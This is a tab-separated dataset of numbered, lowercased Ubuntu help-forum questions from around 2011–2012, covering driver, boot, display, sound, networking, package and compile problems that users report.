98790	how to recover data from ntfs partition that was made into a swap partition ?	i have extremely important stuff on my windows partition which during the ubuntu 10.10 installation , when it said that i should create something called swap space , i selected it to be a swap space ( without even knowing what it actually meant ) the grub2 does n't show up so i do n't get a choice to boot ubuntu or windows . i do n't get my windows partition as a removable device in ubuntu either . when i go to disk utility and select the sda2 ( i.e.. my windows partition ) and click edit partition and select hpfs/ntfs for the type and tick bootable and click ok the small processing sign keep on rotating on the bottom right of the sda2 in the chart and after about 10 to 15 minutes it gives an unknown error and thus , i am still unable to use my windows . i am even worse than a beginner who does n't know a thing about ubuntu so please be patient and help me out .
98794	install flash player 11 onto ubuntu 10.04 ?	i haved looked at loads of questions , and none have solved this . i want to install flash 11 ( min 10 ) on ubuntu 10.04 . please can someone guide ?
98800	why did my keyboard stop working ?	i have a machine running 11.04 . last night , everything was working fine , but this morning when i booted it , the keyboard would n't work . pressing every key on it resulted in only one letter of input , and i could not get any key to consistently work . i have tried replacing the keyboard , i 've tried multiple usb ports with each keyboard , not even the on-screen virtual keyboard will work . what 's going on here and how can i fix it ? i just booted to a console and the keyboard worked fine .
98803	why does the grub menu list two different versions of ubuntu to boot into after i upgraded ?	i successfully upgraded from 10.04 to 10.10 , albeit with a bit of a struggle . however , after upgrading to 10.10 , i rebooted to find that i had a new option . windows xp , ubuntu 10.10 and ubuntu 10.04 . i was wondering why the new upgrade did n't overwrite the original 10.04 install . i have yet to boot from the 10.04 again . is this common ?
98806	icons on gnome-shell 's top status bar getting drawn beyond normal	following is what 's happening ( plesae check the icon for show desktop/firefox/advanced setting on the top bar falling outside ) : can we do something about this ?
98810	how can i change screen 's resolution ?	as you can see in the title , i 'd like to increase my screen 's resolution ( which dicreased on its own ! ) , but when going to displays , screen can not be recognized and it 's unknown . it may be too easy to do , but i 'm new here . thank you .
98814	why do i have no sound when resuming from sleep , but if i plug in then remove headphones sound returns ?	i am having strange issues with sound and volume with ubuntu 11.10 i 've noticed very often , especially when i get my computer out of sleep , it lacks sound even though the volume slider is cranked all the way up , but when i plug my headphones in and then take them out , it seems to kick start my sound back ! what gives ? what daemon in /etc/int.d needs to be restared with the restart command to fix this ? i have the following in my init.d folder /etc/init.d/alsa-restore and /etc/init.d/alsa-store also , my start up ubuntu sound does n't play either ... .
98816	apache and mod_mono - only serves html files	i have tried to set up an ubuntu server running apache/mod_mono in a virtualbox vm , and have encountered a problem when trying to configure apache to use mod_mono to serve the asp.net application . i got a dummy asp.net application in /var/www/aspx1 ( a simple default.aspx and a minimalistic web.config ) . here is my httpd.conf file : servername localhost include mod_mono.conf and my mod_mono.conf : < ifmodule ! mod_mono.c > loadmodule mono_module modules/mod_mono.so monoautoapplication enabled addtype application/x-asp-net .aspx addtype application/x-asp-net .asmx addtype application/x-asp-net .ashx addtype application/x-asp-net .asax addtype application/x-asp-net .ascx addtype application/x-asp-net .soap addtype application/x-asp-net .rem addtype application/x-asp-net .axd addtype application/x-asp-net .cs addtype application/x-asp-net .vb addtype application/x-asp-net .master addtype application/x-asp-net .sitemap addtype application/x-asp-net .resources addtype application/x-asp-net .skin addtype application/x-asp-net .browser addtype application/x-asp-net .webinfo addtype application/x-asp-net .resx addtype application/x-asp-net .licx addtype application/x-asp-net .csproj addtype application/x-asp-net .vbproj addtype application/x-asp-net .config addtype application/x-asp-net .config addtype application/x-asp-net .dll directoryindex index.aspx directoryindex default.aspx directoryindex default.aspx < /ifmodule > i have also tried to disable monoautoapplication and add the following lines : addmonoapplications default `` / : /var/www '' < location `` / '' > sethandler mono < /location > going to http : //int.er.nal.ip/aspx1/ simply lists the folder contents ( apache standard listing ) and going to http : //int.er.nal.ip/aspx1/default.aspx offers to save the file . after every change i have restarted apache , and also rebooted the vm just in case . thanks !
98818	does anyone know how to get linux to recognize my pinnacle video digitizer box ?	i have a pinnacle video studio capture box and was wondering if anyone out there had gotten linux to work with it or any of its brethren ( dazzle , ultimate studio , etc. ) ? it connects through the usb port and then to any composite/s-video source . there is no tuner , just video .
98823	how to add current time to the unlock screen ?	i frequently have to unlock my computer just to see what time is it right now . since time is n't security-sensitive , how can i add it to be displayed on the unlock screen ? this is using unity , ubuntu 's default shell .
98827	ati driver re-install fail	i know this is a common topic , i myself have even helped others with ati issues . unfortunately now i find myself in the position of having ati driver issues . the 12.1 driver is out , and i heard some issues with the screen flicker have been fixed . ok , so i said i uninstall my current one , and get the new one . so for uninstall i did : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* and then i installed it normally by running the executable : sh ./ati-driver-installer-11-10-x86.x86_64.run the driver would n't install cause it was saying a current one is already there , so ... like a dumb a*** i used -- force sh ./ati-driver-installer-11-10-x86.x86_64.run -- force this run through the installer apparently without issues . unfortunately while installing i realized i should have used the following commands : sh ./ati-driver-installer-11-10-x86.x86_64.run -- buildpkg ubuntu/oneiric sudo dpkg -i fglrx*.deb well , now i already run the force one , so i rebooted to see what the result is . after failed attempt to start xserver , i managed to log into the 2d fallback version . now if i try to run the installer directly i get a warning message : a previous install of fglrx driver has been detected ... . if i try to build the fglrx package with : sh ./amd-driver-installer-12-1-x86.x86_64.run -- buildpkg ubuntu/oneiric i get the error : objdump : debian/fglrx/usr/lib/fglrx/alt_ld.so.conf : file truncated objdump : debian/fglrx/usr/lib/fglrx/ld.so.conf : file format not recognized objdump : debian/fglrx/usr/lib/pxpress/alt_ld.so.conf : file truncated objdump : debian/fglrx/usr/lib/pxpress/ld.so.conf : file format not recognized debian/rules override_dh_shlibdeps make [ 1 ] : entering directory `/tmp/fglrx.wv9uqm' dh_shlibdeps -l/tmp/fglrx.wv9uqm/debian/fglrx/usr/lib/fglrx : /tmp/fglrx.wv9uqm/debian/fglrx/usr/lib32/fglrx -xlib32 dpkg-shlibdeps : warning : debian/fglrx/usr/lib/fglrx/libamdxvba.so.1.0 contains an unresolvable reference to symbol dlsym : it 's probably a plugin . dpkg-shlibdeps : warning : 23 other similar warnings have been skipped ( use -v to see them all ) . dpkg-shlibdeps : warning : debian/fglrx/usr/lib/fglrx/bin/atieventsd contains an unresolvable reference to symbol xaufilename : it 's probably a plugin . dpkg-shlibdeps : warning : debian/fglrx/usr/lib/fglrx/libgl.so.1.2 contains an unresolvable reference to symbol xopendisplay : it 's probably a plugin . dpkg-shlibdeps : warning : 31 other similar warnings have been skipped ( use -v to see them all ) . dpkg-shlibdeps : error : no dependency information found for /usr/share/ati/lib64/libqtcore.so.4 ( used by debian/fglrx/usr/lib/fglrx/bin/amdnotifyui ) . dh_shlibdeps : dpkg-shlibdeps -tdebian/fglrx.substvars debian/fglrx/usr/lib/fglrx/libaticalcl.so debian/fglrx/usr/lib/fglrx/dri/fglrx_dri.so debian/fglrx/usr/lib/fglrx/libatiuki.so.1.0 debian/fglrx/usr/lib/fglrx/bin/atieventsd debian/fglrx/usr/lib/fglrx/bin/amdnotifyui debian/fglrx/usr/lib/fglrx/bin/aticonfig debian/fglrx/usr/lib/fglrx/bin/atiode debian/fglrx/usr/lib/fglrx/bin/fgl_glxgears debian/fglrx/usr/lib/fglrx/bin/atiodcli debian/fglrx/usr/lib/fglrx/bin/fglrxinfo debian/fglrx/usr/lib/fglrx/libamdxvba.so.1.0 debian/fglrx/usr/lib/fglrx/libaticalrt.so debian/fglrx/usr/lib/fglrx/libatiadlxx.so debian/fglrx/usr/lib/fglrx/libopencl.so.1 debian/fglrx/usr/lib/fglrx/libxvbaw.so.1.0 debian/fglrx/usr/lib/fglrx/libgl.so.1.2 debian/fglrx/usr/lib/fglrx/libslotmaximizerag.so debian/fglrx/usr/lib/fglrx/libamdocl64.so debian/fglrx/usr/lib/fglrx/libaticaldd.so debian/fglrx/usr/lib/fglrx/xorg/modules/glesx.so debian/fglrx/usr/lib/fglrx/xorg/modules/extensions/libglx.so debian/fglrx/usr/lib/fglrx/xorg/modules/linux/libfglrxdrm.so debian/fglrx/usr/lib/fglrx/xorg/modules/amdxmm.so debian/fglrx/usr/lib/fglrx/xorg/modules/drivers/fglrx_drv.so debian/fglrx/usr/lib/fglrx/libslotmaximizerbe.so debian/fglrx/usr/lib/fglrx/libfglrx_dm.so.1.0 returned exit code 2 make [ 1 ] : *** [ override_dh_shlibdeps ] error 2 make [ 1 ] : leaving directory `/tmp/fglrx.wv9uqm' make : *** [ binary-arch ] error 2 dpkg-buildpackage : error : debian/rules binary gave error exit status 2 removing temporary directory : fglrx-install.yubgiq using : ubuntu 11.10 ; ati hd4870 ;
98828	where should i save my web project files ?	i just installed ubuntu on my personal machine . i 've never used linux before . i installed ruby , and ruby on rails . i 'm about to start a new project . where should i save it ? i tried cd /var then mkdir www and got a permission denied error . so i did sudo mkdir www . but now i am afraid that every time i want to save or create something , whether using rails console or my text editor , i 'm going to get permission errors . should i move my project into my home dir ?
98829	how to fix a corrupt .deb ?	all right , so , i got a really persistent error . i tried to install mfc6490cwlpr : i386 ( downloaded as mfc6490cwlpr-1.1.2-2.i386.deb ) and installed it using either gdebi or the ubuntu software centre , probably both even . following instructions , i restarted my computer and the following error appeared on my upper bar in unity : an error occured , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : ' < type 'exceptions.systemerror ' > ' ( e : the package mfc6490cwlpr : i386 needs to be reinstalled , but i ca n't find an archive for it. ) ' . this usually means that your installed packages have unmet dependencies i tried several ways to remove it . among the following commands : sudo dpkg -- remove -- force-remove-reinstreq mfc6490cwlpr : i386 sudo dpkg -- force-all -r mfc6490cwlpr : i386 digging further into history , i find this command : sudo dpkg -i -- force-all -- force-architecture mfc6490cwlpr-1.1.2-2.i386.deb i 'm running on a 64-bit amd processor . whenever i do anything that involves apt-get , updating , synaptic or what what what , i get this error : reading package lists ... done building dependency tree reading state information ... done e : the package mfc6490cwlpr : i386 needs to be reinstalled , but i ca n't find an archive for it . the updater recommended a dist-upgrade , which did n't work . does anyone have any ideas to remove the corrupt .deb ? i can reinstall it later when i have more time to look into hooking up the printer . but for now , i 'm more concerned about getting it off off my computer . worth mentioning : i am not adept at the command line , though i try hard . i 'm fairly dangerous with it , actually .
98830	gnome-tweak-tool and gnome-shell-extensions	i have been having this problem a while and tried all the different things suggested on the site and still have had no luck . my problem is when i try and access the gnome-shell-extensions part of gnome-tweak-tool all i get is a blank screen . this happens no matter which version of either program i use . my current version of gnome-tweak-tool is 3.2-2 , gnome-shell 3.2.2.1-0ubuntu1 , gnome-shell-common 3.2.2.1-0ubuntu1 , and gnome-shell-extensions-common 3.2.0-2~webupd8-oneiric . does anyone have any other ideas of what i could try to get this working ? thanks for any help on this .
98831	how can i add another gmail entity in thunderbird ?	i have setup gmail to use another email account i have ( non-google ) , so when i send emails from gmails web ui , i can choose to send from that other domain . how do i add such an option to thunderbird ? that is , i would like to use gmails smtp server , but send messages using my other account .
98834	how do i switch back to having /dev/shm be the mount point instead of /run/shm ?	i am using 11.10 and have an application ( oracle xe ) which specifically wants shared memory mounted under /dev/shm . i noticed that the way 11.10 is configured , things are mounted at /run/shm and symlinked from /dev/shm . i can get things to work by running hte following as root # kill all apps that are using /run/shm umount /run/shm rmdir /run/shm unlink /dev/shm mkdir /dev/shm mount /dev/shm # i have it defined in /etc/fstab ln -s /dev/shm /run/shm but whenever i reboot , everything goes back to the way that ubuntu ships . what do i need to change to get ubuntu to not try and mount /run/shm ? thanks , ransom
98837	which version of ubuntu should i install ?	hej , i am about to install ubuntu 11.10 on my laptop : http : //reviews.cnet.com/laptops/dell-studio-s15z-2249cpn/4507-3121_7-33974716.html ? tag=mncol ; subnav i am not familiar with ubuntu and this is the first time for me using it . first of all , 32 or 64 bit ? moreover , after installing it , what should i do ? do i need to install any driver ? thank you for any answer ! ! /matteo
98839	isp radius server	we are at the first steps in the process of setting up as an isp and looking through the hardware and software that will be needed . currently our wholesale supplier is quoting for a commercial radius server solution ( no details supplied as yet ) . i am an avid ubuntu desktop user and have recently rented an ubuntu virtual private server for hosting our website ( ftp , ssh , apaache config , etc ) the advice that i am looking for is this : what experience does anyone have of this situation ? what options are available for running this on ubuntu ? ideally we would like a web interface for viewing log files , adding new users , etc we would like to shape bandwidth so that we can prioritise sip/voip packets . what options are available surround this ? any further reading that will help on this path ? many thanks in advance
98840	can sound juicer become faster or should i use another program ?	i 'm shocked at how slow sound juicer rips audio cd 's . my machine is an intel i7 with 4gb ram , so i thought that ripping would take just a couple of minutes . but the program takes it 's time and lasts about 20 ' for each cd . is there a way to configure sound juicer to make better use of the available hardware ? is there another program available for faster ripping ? the dvd is a super multi dl drive . i guess it 's faster than single speed . no serious errors on the command line after the extraction starts . before that , gtk errors and glib errors . running it from the command line is much faster . warnings on command line : ( sound-juicer:1285 ) : warning ** : widget ( gtkentry ) has more than one label ( sound-juicer:1285 ) : glib-gobject-warning ** : invalid cast from gdkx11window ' to gtkwidget ' ( sound-juicer:1285 ) : gtk-critical ** : gtk_widget_get_display : assertion gtk_is_widget ( widget ) ' failed ( sound-juicer:1285 ) : gdk-critical ** : gdk_cursor_new_for_display : assertion gdk_is_display ( display ) ' failed ( sound-juicer:1285 ) : gdk-critical ** : gdk_cursor_unref : assertion `cursor ! = null ' failed i 've monitored the system , and the memory use stays below 800mb , also , the processors stay mostly below 20 % . now , if a cd has 700mb max , would n't it be possible to read the smallest song ( in bytes ) into memory , start processing that with one thread , read the next smallest song into memory and spawn the next process , etc ? with 4gb ram , and 8 processors , the computer should not have any problem ripping and encoding 4 cd 's in memory at the same time . or should it ? dd : reading `/dev/cdrom ' : input/output error 0+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 0.0258942 s , 0.0 kb/s real 0m12.087s user 0m0.000s sys 0m0.004s
98842	more hd space after ubuntu instalation	i am a newby user with ubuntu 11.10 , and i have instaled it with windows installer . i like this and i want to do the ubuntu filesystem more bigger . 多anyone know how can i do ? thanks a lot , eder
98844	how do i get a tp link tl wn722n wireless card working ?	i recently built a barebones machine ( shuttle sh67h3 ) , installed oneiric ( 64-bit ) and everything was great ( no wireless card but wired connection was fine ) . now our router has changed locations and i 'm trying to get wireless to work . i purchased a tp-link tl-wn722n because i saw this post and assumed it would be smooth sailing from the moment the wireless usb adapter arrived at my home . wrong . has anyone had any experience setting this up ? i 've downloaded the compat-wireless-driver , compiled and run install ( all successfully ) but am unable to load it . if there are any alternative devices that are known to work with my setup i would love to hear about them as well . update i 've installed the linux backports modules successfully and rebooted several times . still no wireless activity . when i list the usb devices it can clearly see the wireless adapter ( bus 003 device 003 ) plugged in : user @ ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 003 : id 0cf3:9271 atheros communications , inc. ar9271 802.11n bus 001 device 003 : id 192f:0416 avago technologies , pte . bus 001 device 004 : id 413c:1003 dell computer corp . keyboard hub bus 002 device 003 : id 1058:1100 western digital technologies , inc . bus 001 device 005 : id 413c:2010 dell computer corp . keyboard i have tried installing linux-backports-modules-cw-3.1-oneiric-generic but that did not work . the wireless network does not appear under the connection settings . i tried wrapping the windows xp driver following this post using the ndisgtk and ndiswrapper packages . all of the driver .inf files failed to load properly except the windows xp version . the xp version loaded and even recognized the hardware . still no wireless network options after several reboots and unplugs/replugs . are there any other setup steps that i am missing ? after installing linux-backports-modules-cw-3.1-oneric-generic and rebooting should the wireless network just show up under the network settings ? is there anything else i can check at this point ? i 'm willing to settle my loses and buy a different wifi adapter if i could be certain it would work with my setup . anyone using 11.10 + usb wifi adapter ?
98847	ssh responding poorly	why do command line prompts respond poorly i am when ssh'ing into a terminal ?
98849	error message `` requiring clutter , version 1.0 '' displayed and gnome-shell refuses to start	i 'm having some problems with gnome-shell . i downloaded from the ubuntu repository ( not ricotz-testing ) , and typing gnome-shell -- replace i get this ( i removed some repetitions : ) ) : alecive @ calliope : ~ $ gnome-shell -- replace ( gnome-shell:4052 ) : gconf-critical ** : gconf_value_get_string : assertion `value- > type == gconf_value_string ' failed ( gnome-shell:4052 ) : gconf-critical ** : gconf_value_get_string : assertion `value- > type == gconf_value_string ' failed ( gnome-shell:4052 ) : gconf-critical ** : gconf_value_get_string : assertion `value- > type == gconf_value_string ' failed js error : ! ! ! exception was : error : requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found js error : ! ! ! linenumber = '0' js error : ! ! ! filename = ' '' gjs_throw '' ' js error : ! ! ! stack = ' '' ( `` requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found '' ) @ gjs_throw:0 @ /usr/share/gnome-shell/js/ui/environment.js:9 '' ' js error : ! ! ! message = ' '' requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found '' ' js error : ! ! ! exception was : error : requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found js error : ! ! ! linenumber = '0' js error : ! ! ! filename = ' '' gjs_throw '' ' js error : ! ! ! stack = ' '' ( `` requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found '' ) @ gjs_throw:0 @ /usr/share/gnome-shell/js/ui/environment.js:9 '' ' js error : ! ! ! message = ' '' requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found '' ' avviso del window manager : log level 32 : execution of main.js threw exception : error : requiring clutter , version 1.0 : typelib file for namespace 'coglpango ' , version '1.0 ' not found someone could help me in getting gnome-shell running ? i 'm experiencing very annoying behaviors and i really wish to get it on my desktop ! : ( to clarify - i know how to log in into gnome-shell from the login screen , but gnome-shell systematically crashes the desktop . so , to see what errors it gives me , i login into unity environment and then i type gnome-shell -- replace moreover , i already used gnome-shell since its natty version and my video-card fully support it . this seems to be a library issue rather than a simple problem related to my ignorance . i think the last two lines of the code prompted above , you can see some dependency . ps : for the record , i 'm on ubuntu oneiric 11.10 32bit : )
98852	screen resolution not right on a new install	i have installed ubuntu 11.10 on a small netbook . the netbook is a packard bell easynote xs with a 7-inch screen â it use to run windows xp very badly but it runs ubuntu quite well . i completed the 11.10 install several days ago and the only issue i have is that the screen resolution is not quite correct . ubuntu offers me two resolutions 800x480 and 720x480 . unfortunately the 480 part of this means that many of the setup screens are missing their bottom 1 centimeter . this issue seemed irrelevant until i realized that the action buttons such as ok , back , forward appear in this part of the screen , actually doing the ubuntu install turned out to be a little bit of a hit and miss affair and i had to guess my way through it by counting tabs to the invisible action buttons . the packard bell easynote xs netbook originally came with the via unichrome 614100361 screen driver installed as part of the original windowsxp . the screen would show resolutions of 1024x768 . however now that i have loaded ubuntu version 10.11 the driver is lost . is there any way i can have a 1024x768 resolution under ubuntu too ? i am willing to try/experiment but my linux experience is only a few days old and so i would need instruction .
98854	skip installation prompts during upgrade in terminal	can i skip the questions asked during install in terminal ? i was writing sudo apt-get update & & sudo apt-get upgrade & & sudo shutdown -h 1 so that the computer shuts down after updating . but i was wondering what if questions popup during updating like 256 mb updates y/n ?
98855	cron jobs not running	i 've got a couple of scripts that i 've had scheduled to run in cron for a while . about a week or so ago , they stopped running as far as the ( very basic ) logging showed , and also i noticed that my wallpaper was n't being rotated any more . josh @ sirius : ~ $ crontab -l # m h dom mon dow command 0 * * * * /bin/bash /home/josh/bin/rotate-wallpaper */30 * * * * /bin/bash /home/josh/bin/download-programmes * * * * * echo `` i ran '' > /home/josh/cronstamp neither of the first two commands are run , but the ~/cronstamp file does get created and written to as expected .
98862	nautilus wo n't open	i 'm running ubuntu 11.10 64bit . i ca n't get nautilus to open anything from the places menu or a folder on my desktop . what i can do for a folder on my desktop is right click , open with other application . i have 2 choices , files or file browser . if i choose files it opens immediately . however , if i choose file browser nothing happens . how do i edit the entry so that everything opens using files ?
98863	mathtype and libreoffice math comparison	in my office my team and i are going to type texts in the future which will include mathematical signs . two programs are being proposed : libreoffice writer + math or microsoft office + mathtype . i would like to advocate for the first solution , but i need to know what technical advantages and disadvantages each program has . compatibility with ubuntu is an evident and important characteristic for libreoffice , but could you give some other aspects ? as a side question , do you advice any other program , even if not wysiwyg and thus not my preference in this case ?
98864	how can i re-enable the global menu in firefox ?	until recently , firefox on my machine used the standard unity global menu . however , recently the menu is no longer global and , strangely , is centered . see this screenshot : firefox-globalmenu is installed , the extension is enabled on the add-ons page , and all other programs work as expected . furthermore , the menu is as expected in a guest session . here are the extensions i have enabled : adblock plus 2.0.3 autopager 0.7.1.2 firebug 1.9.0 flagfox 4.1.11 global menu bar integration 2.0.2 instantfox 2.6.1 searchbar autosizer 1.5.7 tab scope 1.1.3 ubuntu firefox modifications 1.0.2 united states english spellchecker 5.0.1 ( frequently fails to check spelling , allowing words like `` spekk '' and rejecting all contractions such as `` ca n't '' ) unity integration for firefox 0.2.4 how can i get the global menu back ? ( this is ubuntu oneiric [ 11.10 ] with firefox 9.0.1 . ) update i restarted in safe mode ( all add-ons disabled ) . here 's what i saw ( note that the only change is that the menubar is no longer centered ) : next , i renamed ~/.mozilla to try a fresh profile . the problem was cured . however , i consider this to be an unacceptable solution since i have a lot of settings , add-ons , stored data , etc. , etc . that would be lost with a fresh profile , only some of which is covered by firefox sync . a solution that involves lost data is no solution .
98866	hibernation stalls	to start , i installed ubuntu 11.10 , i disliked unity and then installed the xubuntu session on top of it . i only say this to make you understand that i have this problem in both sessions . whenever i click on the hibernate option , or the suspend option , the screen goes black and then starts to hibernate/suspend . the problem , though , is that it seems to hang when it hibernates . the first few times that i tried to hibernate , i got a blinking underscore in the top left of the screen . after awhile the underscore would stop blinking , and that 's when it seemed to stop . i then followed the instructions in this post fix hibernation issue in ubuntu 11.10 now when i click on hibernate the hibernation begins , it seems to save the image , and then it seems to stop , the same thing i thought had happened originally . the screen goes all black and in the top left it says : looking for splash system ... none s2disk : snapshotting system it stays on this forever and i end up having to just shut off my laptop . here are two log files from pm-suspend.log one from before hibernation `` fix '' and one from after hibernation `` fix '' i hope the provided information helps , i 'm not sure what the problem is , whether i 'm just not waiting long enough for it to hibernate , or if it 's something else . i 'm quite new to linux and just starting to get a slight grasp of things .
98867	how to fix resolution to 1920x1080 on panasonic hdtv	ive been having trouble figuring out why the nvidia driver can not work with my hdtv ( panasonic lcd hdtv ( tc - l42u30 ) . the problem right now is that the nvidia configuration sets the display at 640x480 ( 4:3 ) which does n't look good at all since i can not even see all of the desktop ... i am not sure how to change the settings to make it work in the native resolution of 1920x1080 which is correct for this tv ... . any help would be useful !
98868	libnotify , pkg_config_path	i am installing spidermonkey on ubuntu 11.10 . when running ./configure i receive a dependency error that libnotify > = 0.4 is not met . located the package in ubuntu as gir1.2-notify-0.7 so then i found out where it was installed . renshaw @ renshaw-travelmate-5740g : ~/spidermonkey $ dpkg -l gir1.2-notify-0.7 / . /usr /usr/share /usr/share/doc /usr/share/doc/gir1.2-notify-0.7 /usr/share/doc/gir1.2-notify-0.7/copyright /usr/lib /usr/lib/girepository-1.0 /usr/lib/girepository-1.0/notify-0.7.typelib /usr/share/doc/gir1.2-notify-0.7/authors /usr/share/doc/gir1.2-notify-0.7/news.gz /usr/share/doc/gir1.2-notify-0.7/changelog.debian.gz so then i have attempted to add this to pkg_config_path with export pkg_config_path=/usr/lib/ : /usr/lib/girepository-1.0/notify-0.7.typelib however i still receive the error . configure : error : library requirements ( libnotify > = 0.4 ) not met ; how can i get ./configure to see libnotify as gir1.2-notify-0.7 ?
98872	move window to right/left workspace shortcut	i am looking for the keyboard shortcut of `` move to workspace right/left '' like this : i 'm using compiz cube , with 4 horizontal workspaces ( i 'm not looking for `` move to another workspace '' shortcut )
98882	how to make ubuntu a cli after installing from live usb ?	i am trying to install ubuntu as a command line only but only found that you cant really do it off a usb as the alt . cd requires it be on a cd to install and i looked around but could n't find how to make ubuntu cli after installing so there any help guys ?
98883	why do i get a `` configure : error : could not compile basic x program . '' error when trying to compile spidermonkey ?	i am trying to install spidermonkey on 11.10 . however i am having many compile issues . most recently i have received this error , but i can not understand exactly what the error is . checking whether c compiler supports -fprofile-generate ... yes checking whether c++ compiler has -pedantic long long bug ... no checking for correct overload resolution with const and templates ... no checking what kind of list files are supported by the linker ... linkerscript checking for glib-2.0 > = 1.3.7 gobject-2.0 ... yes checking glib_cflags ... -pthread -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux- gnu/glib-2.0/include checking glib_libs ... -pthread -lgobject-2.0 -lgthread-2.0 -lrt -lglib-2.0 checking for stdint.h ... yes checking for inttypes.h ... yes checking for sys/int_types.h ... no checking for iwlib.h ... yes checking for posix_fallocate ... yes configure : error : could not compile basic x program . renshaw @ renshaw-travelmate-5740g : ~/spidermonkey $ i was trying to follow from an answer on stackoverflow - install spidermonkey . i am not having much success . is that error above resolvable ?
98887	kubuntu proprietary drivers vs open source	which driver has better performance with the kde desktop environment for kubuntu 11.10 ? laptop integrated amd mobility radeon hd 3200 .
98888	ca n't get packages after installing faience	i installed the faience theme ( sudo apt-get install faience ) and it installed fine . then i tried installing another package and it said this ... reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : faience : depends : faenza but it is not going to be installed gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . please help : o !
98897	was i supposed to have something in this partition ?	edit $ 3 looks like it already saved my swap even without editing fstab . take a look : edit # 2 : alright - rebooted and this is what i got , let me know if i did everything correctly : edit # 1 : alright , recreated swap , let me know if i did it right , also , i right clicked and hit `` swapon '' as well - here 's what i got : i 'm not sure what all filesystems my harddrive was supposed to have after linux build them , but something i did the other day , until recently , the unallocated partition you see before you said `` unknown '' and had a red circle by it . it had just appeared there after i did something on accident with another program trying to format my other partition
98899	how to install java and which version of it ?	i 'm on ubuntu 11.10 and i wan na know which version ( openjdk or sun 's one or whatever ) is the best to develop applications and use it with eclipse , and how to install it . thank you .
98906	dual monitors and unity - ati radeon cards	i have a vaio laptop with an ati radeon video card and an external screen . i used to run dual monitors on ubuntu 10.10 fine , but recently decided to upgrade to 11.10 via 11.04 i do n't think it 's the video card or the fglrx driver . it seems to be unity . when i start up , the laptop screen is normal and the external screen is all white , although i can move my mouse over it . however , the cursor becomes the big x that used to be cursor of the first versions of xwindows . i can right click on it , and it brings up the context menu for the desktop . and then , all of a sudden , it shows my desktop background . i can continue to move my mouse over the external screen , and now the cursor is normal ( little white arrow ) . but i ca n't do anything any longer ( not even the context menu as before ) , and trying to drag a window to it ( which always worked on 10.10 ) does n't work . i actually really like unity . it gives me the most our of my desktop , and uses all space available , which is great . but how can i get my second screen back ? i tried unity 2d , but the result is the same . edit : i think i stumbled on this bug : https : //bugs.launchpad.net/ubuntu/+source/nvidia-settings/+bug/882143
98907	networking failing on both wired and wireless connections	running 11.10 on a lenovo b570 , maybe a month old . when i try to connect to a network , wired or wireless , nm-applet does its normal `` connecting '' animation , but sort of `` spasming '' at the end of the loop . i think what appears in that icon 's place for a frame or so might be a `` loading applet '' icon . after maybe a minute , the applet gives up trying to connect . this behavior started in the past several hours and has persisted after a reboot . this output may be relevant : $ netstat -nr kernel ip routing table destination gateway genmask flags mss window irtt iface 7 march 2012 this has now resurfaced . in hopes of providing further useful information : $ cat /etc/network/interfaces auto lo iface lo inet loopback
98909	i do n't like the `` new desktop '' provided by 11.10 . how do i get the old one back ?	i 'm not sure what this new desktop is called . but things i dislike : when i hover my mouse on the top of the screen , a menu shows . in the past , the menu is always there . the new panel on the left . i dislike such style ... where 's the bar at the bottom ? the one that shows the windows currently opened , etc . i did some google work and found this . but the command sudo apt-get install gnome-panel only gives the error : e : package 'gnome-panel ' has no installation candidate . please help . thanks !
98911	unable to record with my headset on livemocha.com using and flash 11	when i try to use headset on livemocha.com to record feedback all i hear when i listen to my recording is white noise . i know my headset is generally working because i 'm able to use the sound recorder application successfully with my headset . livemocha.com uses flash so i 'm guessing it is a problem that is flash related , but i 've ensured i have the latest version 11 and also ensured java is installed properly . i 'm at a loss of what else i can do to get this to work . i would really like to use my headset with either my desktop or laptop running 11.10 , but i so far have only been able to record using my laptop 's built in microphone , so this problem seem to only affect my headset . i 've tried 2 usb headsets and also one that uses 3.5 plug . i 'm able to get all three generally working with sound recorder but not with through flash on livemocha.com ... ? ? ? any ideas ?
98916	how do i configure a displaylink usb monitor ?	i have seen many pieces but not a comprehensive guide to fix what must be a very common problem , particularly in ubuntu 11.10 where there is no xorg.conf file . is there an easy how-to somewhere ( for linux newbies like me ) to get this done . the other pieces i 've seen require a fair amount of linux ability to make them work . even better would be to make ubuntu automatically detect these types of monitors . i have a green screen and the drivers installed . i just ca n't see a picture on my doublesight usb monitor . any help would be appreciated .
98917	how do i debug a program which i set to start at login , but it does n't ?	i have a program i want to run when i login . i added it using the `` startup applications '' program , as i have done before to run other things . but this program does n't start automatically . if i run it manually after logging in , it works fine . so.. how do i debug this ? the program in question is gtk-redshift , fwiw .
98922	how can i make windows boot first and ubuntu second ?	how can i make windows boot first ?
98924	is possible to run the jsc ( javascriptcore ) utility from the command line in ubuntu , like in osx ?	in osx there is a hidden utility called jsc , part of webkit , that can be used to run javascript code on the command line . it can be used as a javascript console , like irb for ruby . i have the libwebkitgtk-3.0 and -3.0-dev libraries installed , but i can not figure out how to find or build jsc . is it even possible ? note : i already know about alternatives like rhino , spidermonkey , etc .
